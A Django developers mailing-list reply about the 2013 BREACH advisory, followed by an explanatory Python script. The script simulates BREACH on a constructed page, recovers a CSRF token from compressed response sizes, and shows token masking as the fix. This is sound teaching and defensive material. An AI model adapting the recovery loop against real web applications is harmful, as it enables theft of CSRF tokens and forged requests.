This is a fascinating attack. I scanned all of the information that I could find and it wasn't clear how this could be used to breach CSRF protection. Is there more detail somewhere on that specific attack vector?
-Rob

On Tuesday, August 6, 2013 10:42:01 AM UTC-4, Jacob Kaplan-Moss wrote:
>
> Hi folks --
>
> At last week's Black Hat conference, researchers announced the BREACH
> attack (http://breachattack.com/), a new attack on web apps that can
> recover data even when secured with SSL connections. Given what we know so
> far, we believe that BREACH may be used to compromise Django's CSRF
> protection. Thus, we're issuing a security advisory so that our users can
> defend themselves.
>
> You can read more details, including the steps you can take to protect
> yourself against this attack, on our blog:
>
> https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/
>
> We plan to take steps to address BREACH in Django itself, but in the
> meantime we recommend that all users of Django understand this
> vulnerability and take action if appropriate.
>
> Jacob
>
> --
> You received this message because you are subscribed to the Google Groups "Django developers" group.
> To unsubscribe from this group and stop receiving emails from it, send an email to [email protected].
> To post to this group, send email to [email protected].
> Visit this group at http://groups.google.com/group/django-developers.
> For more options, visit https://groups.google.com/groups/opt_out.
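The mechanism Rob asks about, as an added illustration that is not part of either message above and is not Django's own code: BREACH is a compression side channel. When a response is gzip/DEFLATE-compressed and carries both a secret (here the `csrfmiddlewaretoken` hidden field) and a string the attacker controls (a reflected query parameter), a guess that matches the next character of the secret is swallowed by an LZ77 back-reference and the body comes out a byte shorter on the wire. The attacker needs no TLS break, only the ability to make the victim's browser issue requests and to observe response sizes. The script below builds a constructed page with both ingredients, recovers the token from compressed lengths alone, and then shows why per-response masking (the same additive mask-plus-cipher scheme Django later shipped; the `mask_token`/`unmask_token` names and the 16-character secret are assumptions of this example) defeats it: the bytes that carry the secret change on every response, so the oracle no longer converges. `Z_FIXED` pins the Huffman table so the demo is deterministic; against dynamic Huffman codes the attack still works but needs the paper's two-tries and averaging tricks to average out the noise.

```python
import secrets
import string
import zlib

# Constructed values for this example (not Django's): token character set and length.
ALPHABET = string.ascii_letters + string.digits
TOKEN_LEN = 16


def new_token(length=TOKEN_LEN):
    """Random secret drawn from ALPHABET; stands in for a CSRF token."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def render_page(token_in_body: str, reflected: bytes) -> bytes:
    """Constructed page: the CSRF token sits in a hidden form field and an
    attacker-controlled parameter is echoed into the same response."""
    return (
        b"<html><body><form method='post'>"
        b"<input type='hidden' name='csrfmiddlewaretoken' value='"
        + token_in_body.encode()
        + b"'/></form><p>Results for: "
        + reflected
        + b"</p></body></html>"
    )


def gzip_len(body: bytes) -> int:
    """All the attacker observes: the gzip-compressed size of the body.
    Z_FIXED keeps the Huffman table constant so only the LZ77 match length varies."""
    comp = zlib.compressobj(level=6, wbits=31, strategy=zlib.Z_FIXED)
    return len(comp.compress(body) + comp.flush())


# Alignment pads: bytes >= 0x80 cost 9 bits each under fixed Huffman codes, so the
# second pad shifts bit alignment and breaks the occasional byte-rounding tie.
PADS = (b"", b"\xc3\xa9")


def breach_recover(oracle, prefix=b"value='", length=TOKEN_LEN, alphabet=ALPHABET):
    """Recover the secret that follows `prefix` in the response one character at
    a time. oracle(reflected_bytes) -> compressed length. The candidate that
    extends the existing repeat compresses best, i.e. gives the shortest body."""
    known = b""
    for _ in range(length):
        best = min(
            alphabet,
            key=lambda c: sum(oracle(prefix + known + c.encode() + pad) for pad in PADS),
        )
        known += best.encode()
    return known.decode()


def mask_token(secret: str) -> str:
    """Per-response masking (assumed helper): a fresh random mask followed by the
    secret shifted by that mask, so the secret-bearing bytes differ every response."""
    mask = new_token(len(secret))
    n = len(ALPHABET)
    cipher = "".join(
        ALPHABET[(ALPHABET.index(s) + ALPHABET.index(m)) % n] for s, m in zip(secret, mask)
    )
    return mask + cipher


def unmask_token(masked: str) -> str:
    """Inverse of mask_token: the server still validates against the real secret."""
    half = len(masked) // 2
    mask, cipher = masked[:half], masked[half:]
    n = len(ALPHABET)
    return "".join(
        ALPHABET[(ALPHABET.index(c) - ALPHABET.index(m)) % n] for c, m in zip(cipher, mask)
    )


def attack(secret: str, masked: bool) -> str:
    """Run the attacker against an unmasked or a masked page; returns the guess."""
    def oracle(reflected: bytes) -> int:
        shown = mask_token(secret) if masked else secret
        return gzip_len(render_page(shown, reflected))
    return breach_recover(oracle)


if __name__ == "__main__":
    secret = new_token()
    print("secret  :", secret)
    print("unmasked:", attack(secret, masked=False))  # recovered from sizes alone
    print("masked  :", attack(secret, masked=True))   # no longer converges
```

Each recovered character costs about 62 guesses times two pads, so a whole token is a few thousand requests, which is the scale reported for BREACH. The attack needs all three ingredients at once, compression, a secret in the body, and attacker-controlled reflection in that same body; removing any one (disabling HTTP compression, moving the token out of the compressed response, or masking it so its byte pattern changes per response) breaks the oracle.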
